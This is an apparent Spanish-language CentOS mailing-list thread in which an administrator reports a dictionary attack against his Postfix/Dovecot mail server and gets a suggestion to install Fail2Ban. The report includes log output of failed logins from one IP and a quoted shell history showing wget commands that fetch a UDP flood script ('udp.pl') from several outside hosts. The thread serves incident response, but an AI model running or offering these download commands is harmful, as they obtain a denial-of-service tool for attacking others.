[CentOS-es] Servidor Scaneado por un diccionario de datos en ostfix+dovecot

Dom Mar 24 21:02:23 UTC 2013

Puedes instalarte Fail2Ban que soporta Dovecot: http://wiki.dovecot.org/HowTo/Fail2Ban  

Cuando detecte el número de fallos que configures en un tiempo también configurable, inserta una regla IPTables que bloquea a esa IP un tiempo que también puedes configurar.

Lo puedes usar también para SSH y otros servicios.

--  
José María Terry Jiménez

El jueves 21 de marzo de 2013 a las 16:55, Luis Alberto Roman Aguirre escribió:

> Buenos días a todos de la lista:
> Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...--------------------- pam_unix Begin
> ------------------------  
>  
> dovecot:
>  
> Authentication
> Failures:
>  
> contacto
> rhost=66.142.38.137 : 88 Time(s)
>  
> teste
> rhost=66.142.38.137 : 88 Time(s)
>  
> basura
> rhost=66.142.38.137 : 65 Time(s)
>  
> renata
> rhost=66.142.38.137 : 65 Time(s)
>  
> financeiro
> rhost=66.142.38.137 : 64 Time(s)
>  
> biblioteca
> rhost=66.142.38.137 : 62 Time(s)
>  
> bodega
> rhost=66.142.38.137 : 62 Time(s)
>  
> licita
> rhost=66.142.38.137 : 62 Time(s)
>  
> clientes
> rhost=66.142.38.137 : 61 Time(s)
>  
> contabilidad
> rhost=66.142.38.137 : 59 Time(s)
>  
> estudio
> rhost=66.142.38.137 : 59 Time(s)
>  
> mrivera
> rhost=66.142.38.137 : 58 Time(s)
>  
> patricio
> rhost=66.142.38.137 : 58 Time(s)
>  
> prueba
> rhost=66.142.38.137 : 58 Time(s)
>  
> usuario
> rhost=66.142.38.137 : 58 Time(s)
>  
> turismo
> rhost=66.142.38.137 : 57 Time(s) .......... ................. ............(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip) Unknown Entries:
>  
> check pass;
> user unknown: 3901 Time(s)
> Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto.
> el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget (http://www.buble.biz/alinftp/udp.plwget) www.packetstormsecurity.org/DoS/udp.plping (http://www.packetstormsecurity.org/DoS/udp.plping) www.google.com.peps (http://www.google.com.peps) xcd /tmpls -awpasswd mcondeexit
> El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo.
> Saludos
> Luis Roman
>  
> _______________________________________________
> CentOS-es mailing list
> CentOS-es en centos.org (mailto:CentOS-es en centos.org)
> http://lists.centos.org/mailman/listinfo/centos-es
>  
>  